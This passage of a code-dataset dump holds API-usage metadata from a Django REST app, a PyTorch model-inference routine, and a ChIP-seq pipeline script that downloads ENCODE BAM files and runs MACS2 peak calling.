"attribute"}, {"api_name": "models.MatchedUser", "line_number": 990, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 997, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 997, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 997, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 998, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 998, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1000, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 1000, "usage_type": "name"}, {"api_name": "django.utils.decorators.method_decorator", "line_number": 975, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 975, "usage_type": "argument"}, {"api_name": "rest_framework.views.APIView", "line_number": 1004, "usage_type": "name"}, {"api_name": "models.MatchedUser", "line_number": 1005, "usage_type": "name"}, {"api_name": "serializers.DeleteSuperMatchSerializer", "line_number": 1006, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 1011, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 1011, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 1011, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1013, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 1013, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 1020, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 1020, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 1020, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 1028, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 1028, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 1028, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1029, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 1029, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1031, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 1031, "usage_type": "name"}, {"api_name": "django.utils.decorators.method_decorator", "line_number": 1003, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 1003, "usage_type": "argument"}, {"api_name": "rest_framework.generics.CreateAPIView", "line_number": 1035, "usage_type": "name"}, {"api_name": "models.RequestMeeting", "line_number": 1036, "usage_type": "name"}, {"api_name": "serializers.RequestMeetingSerializer", "line_number": 1037, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1043, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1043, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1043, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1045, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1045, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 
1045, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1048, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1048, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1048, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1051, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1051, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1051, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 1052, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 1052, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 1052, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 1053, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 1053, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 1053, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 1055, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 1055, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 1055, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 1056, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 1056, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 1056, "usage_type": "name"}, {"api_name": "models.RequestMeeting.objects.create", "line_number": 1063, "usage_type": "call"}, {"api_name": "models.RequestMeeting.objects", "line_number": 1063, "usage_type": "attribute"}, {"api_name": "models.RequestMeeting", "line_number": 1063, "usage_type": "name"}, {"api_name": "models.InAppNotification.objects.create", "line_number": 1066, "usage_type": "call"}, {"api_name": "models.InAppNotification.objects", "line_number": 1066, "usage_type": "attribute"}, {"api_name": "models.InAppNotification", "line_number": 1066, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1076, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 1076, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1078, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 1078, "usage_type": "name"}, {"api_name": "django.utils.decorators.method_decorator", "line_number": 1034, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 1034, "usage_type": "argument"}, {"api_name": "rest_framework.generics.UpdateAPIView", "line_number": 1081, "usage_type": "name"}, {"api_name": "models.RequestMeeting", "line_number": 1082, "usage_type": "name"}, {"api_name": "serializers.MeetingStatusSerializer", "line_number": 1083, "usage_type": "name"}, {"api_name": "models.RequestMeeting.objects.all", "line_number": 1084, "usage_type": "call"}, {"api_name": "models.RequestMeeting.objects", "line_number": 1084, "usage_type": "attribute"}, {"api_name": "models.RequestMeeting", "line_number": 1084, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1092, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1092, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1092, 
"usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1095, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1095, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1095, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1098, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1098, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1098, "usage_type": "name"}, {"api_name": "models.InAppNotification.objects.create", "line_number": 1101, "usage_type": "call"}, {"api_name": "models.InAppNotification.objects", "line_number": 1101, "usage_type": "attribute"}, {"api_name": "models.InAppNotification", "line_number": 1101, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1111, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 1111, "usage_type": "name"}, {"api_name": "rest_framework.generics.CreateAPIView", "line_number": 1114, "usage_type": "name"}, {"api_name": "models.ScheduleMeeting", "line_number": 1115, "usage_type": "name"}, {"api_name": "serializers.ScheduleMeetingSerializer", "line_number": 1116, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1121, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1121, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1121, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1122, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1122, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1122, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1129, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1129, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1129, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1132, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1132, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1132, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1135, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1135, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1135, "usage_type": "name"}, {"api_name": "models.ScheduleMeeting.objects.create", "line_number": 1137, "usage_type": "call"}, {"api_name": "models.ScheduleMeeting.objects", "line_number": 1137, "usage_type": "attribute"}, {"api_name": "models.ScheduleMeeting", "line_number": 1137, "usage_type": "name"}, {"api_name": "models.InAppNotification.objects.create", "line_number": 1146, "usage_type": "call"}, {"api_name": "models.InAppNotification.objects", "line_number": 1146, "usage_type": "attribute"}, {"api_name": "models.InAppNotification", "line_number": 1146, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1155, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 1155, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1157, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 1157, 
"usage_type": "name"}, {"api_name": "rest_framework.generics.CreateAPIView", "line_number": 1160, "usage_type": "name"}, {"api_name": "models.Feedback", "line_number": 1161, "usage_type": "name"}, {"api_name": "serializers.FeedbackSerializer", "line_number": 1162, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListCreateAPIView", "line_number": 1165, "usage_type": "name"}, {"api_name": "models.ContactUs", "line_number": 1166, "usage_type": "name"}, {"api_name": "serializers.ContactUsSerializer", "line_number": 1167, "usage_type": "name"}, {"api_name": "models.ContactUs.objects.all", "line_number": 1168, "usage_type": "call"}, {"api_name": "models.ContactUs.objects", "line_number": 1168, "usage_type": "attribute"}, {"api_name": "models.ContactUs", "line_number": 1168, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListCreateAPIView", "line_number": 1171, "usage_type": "name"}, {"api_name": "models.AboutUs", "line_number": 1172, "usage_type": "name"}, {"api_name": "serializers.AboutUsSerializer", "line_number": 1173, "usage_type": "name"}, {"api_name": "models.AboutUs.objects.all", "line_number": 1174, "usage_type": "call"}, {"api_name": "models.AboutUs.objects", "line_number": 1174, "usage_type": "attribute"}, {"api_name": "models.AboutUs", "line_number": 1174, "usage_type": "name"}, {"api_name": "rest_framework.generics.UpdateAPIView", "line_number": 1177, "usage_type": "name"}, {"api_name": "models.AboutUs", "line_number": 1178, "usage_type": "name"}, {"api_name": "serializers.AboutUsSerializer", "line_number": 1179, "usage_type": "name"}, {"api_name": "models.AboutUs.objects.all", "line_number": 1180, "usage_type": "call"}, {"api_name": "models.AboutUs.objects", "line_number": 1180, "usage_type": "attribute"}, {"api_name": "models.AboutUs", "line_number": 1180, "usage_type": "name"}, {"api_name": "rest_framework.generics.UpdateAPIView", "line_number": 1183, "usage_type": "name"}, {"api_name": "models.ContactUs", "line_number": 1184, "usage_type": "name"}, {"api_name": "serializers.ContactUsSerializer", "line_number": 1185, "usage_type": "name"}, {"api_name": "models.ContactUs.objects.all", "line_number": 1186, "usage_type": "call"}, {"api_name": "models.ContactUs.objects", "line_number": 1186, "usage_type": "attribute"}, {"api_name": "models.ContactUs", "line_number": 1186, "usage_type": "name"}, {"api_name": "rest_framework.generics.CreateAPIView", "line_number": 1189, "usage_type": "name"}, {"api_name": "serializers.SocialUserSerializer", "line_number": 1190, "usage_type": "name"}, {"api_name": "models.RegisterUser.objets.get", "line_number": 1208, "usage_type": "call"}, {"api_name": "models.RegisterUser.objets", "line_number": 1208, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1208, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1209, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1209, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1209, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1211, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 1212, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1214, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 1215, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.create", "line_number": 1217, 
"usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1217, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1217, "usage_type": "name"}, {"api_name": "models.UserDetail.objects.create", "line_number": 1234, "usage_type": "call"}, {"api_name": "models.UserDetail.objects", "line_number": 1234, "usage_type": "attribute"}, {"api_name": "models.UserDetail", "line_number": 1234, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1237, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1237, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1237, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1294, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 1294, "usage_type": "name"}, {"api_name": "rest_framework.generics.CreateAPIView", "line_number": 1297, "usage_type": "name"}, {"api_name": "serializers.SocialUserSerializer", "line_number": 1298, "usage_type": "name"}, {"api_name": "models.RegisterUser.objets.get", "line_number": 1316, "usage_type": "call"}, {"api_name": "models.RegisterUser.objets", "line_number": 1316, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1316, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1317, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1317, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1317, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1319, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 1320, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1322, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 1323, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.create", "line_number": 1325, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1325, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1325, "usage_type": "name"}, {"api_name": "models.UserDetail.objects.create", "line_number": 1342, "usage_type": "call"}, {"api_name": "models.UserDetail.objects", "line_number": 1342, "usage_type": "attribute"}, {"api_name": "models.UserDetail", "line_number": 1342, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1345, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1345, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1345, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1402, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 1402, "usage_type": "name"}, {"api_name": "rest_framework.generics.CreateAPIView", "line_number": 1405, "usage_type": "name"}, {"api_name": "serializers.PopUpNotificationSerializer", "line_number": 1406, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1409, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 1409, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 1412, "usage_type": "name"}, {"api_name": "serializers.SubscriptionPlanSerializer", "line_number": 
1413, "usage_type": "name"}, {"api_name": "models.SubscriptionPlans.objects.all", "line_number": 1414, "usage_type": "call"}, {"api_name": "models.SubscriptionPlans.objects", "line_number": 1414, "usage_type": "attribute"}, {"api_name": "models.SubscriptionPlans", "line_number": 1414, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 1459, "usage_type": "name"}, {"api_name": "os.walk", "line_number": 1463, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1465, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1465, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 1466, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 1469, "usage_type": "call"}]} +{"seq_id": "360138686", "text": "import torch.autograd\nfrom tqdm import tqdm\nimport sys\nimport math\n\nimport src.utils as utils\n\n\nclass Inferer(object):\n def test_network(self, params, test_loader, model, criterion, optimiser, verbose=True):\n model.eval()\n\n losses = utils.AverageMeter()\n top1 = utils.AverageMeter()\n top5 = utils.AverageMeter()\n for batch_idx, batch in tqdm(enumerate(test_loader), total=len(test_loader), desc='inference', leave=False):\n # move inputs and targets to GPU\n inputs, targets = batch[0], batch[1]\n if type(batch[0]) == str:\n continue\n\n with torch.no_grad():\n device = 'cuda:' + str(params.gpuList[0])\n if params.use_cuda:\n inputs, targets = inputs.cuda(device, non_blocking=True), targets.cuda(device, non_blocking=True)\n\n # perform inference\n outputs = model(inputs)\n loss = criterion(outputs, targets)\n\n prec1, prec5 = utils.accuracy(outputs.data, targets.data)\n\n losses.update(loss.item())\n top1.update(prec1.item())\n top5.update(prec5.item())\n\n if verbose:\n tqdm.write('Loss: {}, Top1: {}, Top5: {}'.format(losses.avg, top1.avg, top5.avg))\n\n return (losses.avg, top1.avg, top5.avg)\n", "sub_path": "src/inference.py", "file_name": "inference.py", "file_ext": "py", "file_size_in_byte": 1343, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "src.utils.AverageMeter", "line_number": 13, "usage_type": "call"}, {"api_name": "src.utils", "line_number": 13, "usage_type": "name"}, {"api_name": "src.utils.AverageMeter", "line_number": 14, "usage_type": "call"}, {"api_name": "src.utils", "line_number": 14, "usage_type": "name"}, {"api_name": "src.utils.AverageMeter", "line_number": 15, "usage_type": "call"}, {"api_name": "src.utils", "line_number": 15, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.autograd.no_grad", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 22, "usage_type": "name"}, {"api_name": "src.utils.accuracy", "line_number": 31, "usage_type": "call"}, {"api_name": "src.utils", "line_number": 31, "usage_type": "name"}, {"api_name": "tqdm.tqdm.write", "line_number": 38, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 38, "usage_type": "name"}]} +{"seq_id": "5538652", "text": "import urllib.request\nimport os, subprocess, pathlib\nimport configparser\nimport datetime\nfrom collections import OrderedDict\n\nfrom tqdm import tqdm\nfrom collections import defaultdict\nfrom itertools import chain\n\nimport pandas as pd\n\n# we need to import the package folder and libsvm\n# TODO: need to make this cleaner\nimport 
sys\nsys.path.append(\"probefilter\")\nsys.path.append(\"probefilter/libsvm-3.23/python\")\n# from sitesfinder.imads import iMADS\n# from sitesfinder.imadsmodel import iMADSModel\n# from sitesfinder.plotcombiner import PlotCombiner\n# from sitesfinder.pbmescore import PBMEscore\n# from sitesfinder.sequence import Sequence\n\n'''\nSummarize\nlab-archive -> note the result\ninformation about the data in the plot\n'''\n\n# tagsize = 36\n# macs_p = 0.01\n\n#bedpath = \"/data/gordanlab/vincentius/cooperative_probe/hg19_0005_Ets1.bed\"\nbedpath = \"../imads_files/predictions/hg19_0005_Ets1_filtered.bed\"\n\n# Analysis directory\nescore_short_path = \"../escores/ets1_escores.txt\"\nescore_map_path = \"../escores/index_short_to_long.csv\"\n\n# for iMADS, must specify cores and model files\nmodelcores = [\"GGAA\", \"GGAT\"]\nmodelpaths = [\"../imads_files/models/ets1/ETS1_100nM_Bound_filtered_normalized_transformed_20bp_GGAA_1a2a3mer_format.model\",\n \"../imads_files/models/ets1/ETS1_100nM_Bound_filtered_normalized_transformed_20bp_GGAT_1a2a3mer_format.model\"]\nmodelwidth = 20 # TODO: confirm if we can get length without manually specify it\nimads_cutoff = 0.2128\nmodel_kmers = [1,2,3]\n\nescore_cutoff = 0.4\n\n# ============================\n\n# outdir = \"../result/%s\" % chipname\ninit_analysis_file = \"sitefiles_list.txt\" # this is file obtained after running Rscript\n\n# From https://stackoverflow.com/questions/15644964/python-progress-bar-and-downloads\nclass DownloadProgressBar(tqdm):\n def update_to(self, b=1, bsize=1, tsize=None):\n if tsize is not None:\n self.total = tsize\n self.update(b * bsize - self.n)\n\ndef download_url(url, output_path):\n with DownloadProgressBar(unit='B', unit_scale=True,\n miniters=1, desc=url.split('/')[-1]) as t:\n try: \n urllib.request.urlretrieve(url, filename=output_path, reporthook=t.update_to)\n return 0\n except urllib.error.HTTPError:\n return -1\n\n\ndef get_file_info(filename):\n file_info = defaultdict(dict)\n with open(filename, \"r\") as f:\n next(f)\n for line in f.readlines():\n if line.rstrip() != \"\" and not line.startswith(\"#\"):\n items = line.strip().split() # split on space and tab\n exp_id, chip_name, rep_tag, file_id, quality, output_type, antibody_id = \\\n items[0], items[1], items[2], items[3], items[4], items[5], items[6]\n if rep_tag.startswith(\"r\"):\n chip_name = chip_name + \"_\" + exp_id \n else:\n corresponding_chip = items[7]\n chip_name = chip_name + \"_\"+ corresponding_chip\n full_tag = rep_tag + \"_\" + output_type\n file_info[chip_name][full_tag] = file_id\n return file_info\n\n\ndef download_chip(file_info, input_dir):\n\n filtered_file = configparser.ConfigParser()\n unfiltered_file = configparser.ConfigParser()\n outdir = \"../result/chipseq\"\n timestamp = \"\"\n if not os.path.exists(outdir):\n os.makedirs(outdir)\n\n for chipname, tag_fileID in file_info.items():\n chip_path = \"%s/%s\" % (outdir, chipname)\n if not os.path.exists(chip_path):\n os.makedirs(chip_path)\n timestamp += chipname +\"\\n\"\n unfiltered, filtered = OrderedDict(), OrderedDict()\n for tag, file_id in tag_fileID.items():\n fname = file_id + \".bam\"\n saveto = \"%s/%s\" % (chip_path, fname)\n if not os.path.exists(saveto): \n chipurl = \"https://www.encodeproject.org/files/{0}/@@download/{0}.bam\".format(file_id) \n #print(\"Downloading %s ...\" % (fname))\n status = download_url(chipurl, saveto) # takes filename?!\n if status == -1:\n not_download_msg = \"%s was NOT downloaded due to a URL error.\" % fname\n timestamp += 
\"\\t\"+not_download_msg +\"\\n\"\n print(not_download_msg)\n continue\n else:\n now = datetime.datetime.now()\n timestamp += \"\\tDownloaded %s on %s at %s \\n\" % (fname, now.strftime(\"%Y-%m-%d\"), now.strftime(\"%H:%M:%S\"))\n print(\"Finished downloading %s\" % fname)\n else: # if file already existed\n skip_msg = \"%s already existed. Skipped downloading the file.\" % fname\n timestamp += \"\\t\"+ skip_msg +\"\\n\"\n print(skip_msg)\n\n # add to config dictionary\n if \"unfiltered\" in tag:\n unfiltered[tag.split(\"_\")[0]] = fname\n else:\n filtered[tag.split(\"_\")[0]] = fname\n\n if len(filtered)!=0:\n filtered_file[chipname] = filtered\n if len(unfiltered)!=0:\n unfiltered_file[chipname] = unfiltered\n\n with open(\"../result/chipseq/download_timestamp.txt\", 'w') as f:\n f.write(timestamp)\n with open(input_dir + 'chips_unfiltered.config', 'w') as configfile:\n # for call_peaks() to use later\n unfiltered_file.write(configfile)\n with open(input_dir + 'chips_filtered.config', 'w') as configfile:\n filtered_file.write(configfile)\n \n# trying to test fork\n\ndef remove_inner_list(nested_list):\n flat_list = []\n for item in nested_list:\n if isinstance(item, list):\n for i in item:\n flat_list.append(i)\n else:\n flat_list.append(item)\n return flat_list\n\n\ndef call_peaks(chipname, saved_chip_paths, macs_args):\n #outdir = \"../result/%s\" % chipname\n #macs_result_path = \"%s/macs_result/%s\" % (outdir, chipname)\n macs_result_path = \"../result/%s/macs_result\" % (chipname)\n if not os.path.exists(macs_result_path):\n os.makedirs(macs_result_path)\n print(\"Running macs...\")\n \n reps, cntrl = [0]*2, []\n for chip_id, chip_path in saved_chip_paths.items(): \n if chip_id == \"r1\":\n reps[0] = chip_path\n elif chip_id == \"r2\":\n reps[1] = chip_path\n elif chip_id.startswith(\"c\"):\n cntrl.append(chip_path)\n #else:\n # throw exception/warning\n all_rep = [[r] for r in reps]\n all_rep.append(reps) # [[r1], [r2], [r1, r2]]\n tagsize, macs_p = macs_args[0], macs_args[1]\n for indx, rep in enumerate(all_rep):\n output_file = (macs_result_path +\"/\"+ chipname + \"_both\") if len(rep)==2 else (macs_result_path +\"/\"+ chipname + \"_r\" + str(indx+1))\n args = [\"macs2 callpeak\", \"-t\", 0, \"-c\", 0, \"-n\", 0, \"-s\", 0, \"-p\", 0, \"-f BAM -g hs -B\"] # don't need shell script anymore\n args[2], args[4], args[6], args[8], args[10] = rep, cntrl, output_file, tagsize, macs_p\n arg_list = remove_inner_list(args)\n arg_str_list = [str(item) for item in arg_list]\n command = ' '.join(arg_str_list).split()\n \n subprocess.call(command,shell=False)\n\n print(\"Finished running macs for %s, results are saved in %s\" % (chipname, macs_result_path))\n\n\n\n # ----\n \n\n # analysis_result_path = \"%s/analysis_result\" % (outdir)\n # if not os.path.exists(analysis_result_path):\n # os.makedirs(analysis_result_path)\n # print(\"Running analysis...\")\n # pwd = os.path.dirname(os.path.realpath(__file__))\n # pu1_path = \"%s/%s%s\" % (macs_result_path,chipname,\"_r1_treat_pileup.bdg\")\n # pu2_path = \"%s/%s%s\" % (macs_result_path,chipname,\"_r2_treat_pileup.bdg\")\n # pu_both_path = \"%s/%s%s\" % (macs_result_path,chipname,\"_bothrs_treat_pileup.bdg\")\n # nrwp_preidr_path = \"%s/%s%s\" % (macs_result_path,chipname,\"_bothrs_peaks.narrowPeak\")\n # nrwp_postidr_path = \"%s/%s\" % (idr_result_path,\"idr_001p_wlist.005i\")\n # args_rscript = [pu1_path, pu2_path, pu_both_path, nrwp_preidr_path, nrwp_postidr_path, bedpath, analysis_result_path, chipname]\n # 
#subprocess.call([\"srun\",\"Rscript\",\"R_analysis/main.R\",pwd] + args_rscript,shell=False)\n # #subprocess.call([\"Rscript\",\"R_analysis/main.R\",pwd] + args_rscript,shell=False)\n\n\n\n'''\nNote: put all inputs in the input dir\nEnforce: \n- pipeline.config \n\nIf skipped downloadchip:\n- chip_path.config\n\n'''\n\ndef main():\n input_dir = \"../input/\"\n config_pipeline = configparser.ConfigParser()\n config_pipeline.read(input_dir + \"pipeline.config\") \n # NOTE: set defaults in pipline, in case users don't follow the template\n \n if(config_pipeline['pipeline'].getboolean('downloadchip')):\n filename = config_pipeline['downloadchip_param']['chip_to_download']\n file = os.path.join(input_dir, filename)\n file_info = get_file_info(file)\n download_chip(file_info, input_dir)\n print(\"Finished downloading all files :)\")\n else:\n print(\"Skipping downloadchip!\")\n\n \n if(config_pipeline['pipeline'].getboolean('callpeaks')):\n macs_args = (config_pipeline['callpeaks_param']['tagsize'], config_pipeline['callpeaks_param']['macs_p'])\n config_chippath = configparser.ConfigParser()\n config_chippath.read(\"chip_path.config\") # enforce filename and format\n for chipname, saved_chip_path in config_chippath.items():\n if(chipname!=\"DEFAULT\"):\n chip_paths = config_chippath[chipname]\n call_peaks(chipname, chip_paths, macs_args)\n print(\"Finished calling all peaks.\")\n else: \n print(\"Skipping callpeaks!\")\n\n\n \n \n \n\nif __name__==\"__main__\":\n\n main()\n \n\n \n\n'''\n\n \n subprocess.call([\"srun\",\"macs2.sh\",chipdata[\"r1\"],chipdata[\"r2\"],chipdata[\"c1\"],chipdata[\"c2\"],\"%s/%s\" % (macs_result_path,chipname), str(tagsize)],shell=False)\n #subprocess.call([\"./macs2.sh\",chipdata[\"r1\"],chipdata[\"r2\"],chipdata[\"c1\"],chipdata[\"c2\"],\"%s/%s\" % (macs_result_path,chipname), str(tagsize)],shell=False)\n print(\"Finished running macs, results are saved in %s\" % macs_result_path)\n\n idr_result_path = \"%s/idr_result\" % (outdir)\n if not os.path.exists(idr_result_path):\n os.makedirs(idr_result_path)\n print(\"Running idrs...\")\n #subprocess.call([\"srun\",\"idr.sh\",\"%s/%s\" % (macs_result_path,chipname),idr_result_path],shell=False)\n #subprocess.call([\"./idr.sh\",\"%s/%s\" % (macs_result_path,chipname),idr_result_path],shell=False)\n\n\n analysis_result_path = \"%s/analysis_result\" % (outdir)\n if not os.path.exists(analysis_result_path):\n os.makedirs(analysis_result_path)\n print(\"Running analysis...\")\n pwd = os.path.dirname(os.path.realpath(__file__))\n pu1_path = \"%s/%s%s\" % (macs_result_path,chipname,\"_r1_treat_pileup.bdg\")\n pu2_path = \"%s/%s%s\" % (macs_result_path,chipname,\"_r2_treat_pileup.bdg\")\n pu_both_path = \"%s/%s%s\" % (macs_result_path,chipname,\"_bothrs_treat_pileup.bdg\")\n nrwp_preidr_path = \"%s/%s%s\" % (macs_result_path,chipname,\"_bothrs_peaks.narrowPeak\")\n nrwp_postidr_path = \"%s/%s\" % (idr_result_path,\"idr_001p_wlist.005i\")\n args_rscript = [pu1_path, pu2_path, pu_both_path, nrwp_preidr_path, nrwp_postidr_path, bedpath, analysis_result_path, chipname]\n #subprocess.call([\"srun\",\"Rscript\",\"R_analysis/main.R\",pwd] + args_rscript,shell=False)\n #subprocess.call([\"Rscript\",\"R_analysis/main.R\",pwd] + args_rscript,shell=False)\n\n # ============== PLOT AND FILTERING PART ==============\n\n # First, we can just load the models to avoid having to reload this on every iteration\n models = [iMADSModel(modelpath, modelcore, modelwidth, model_kmers) for modelpath, modelcore in zip(modelpaths, modelcores)]\n imads = 
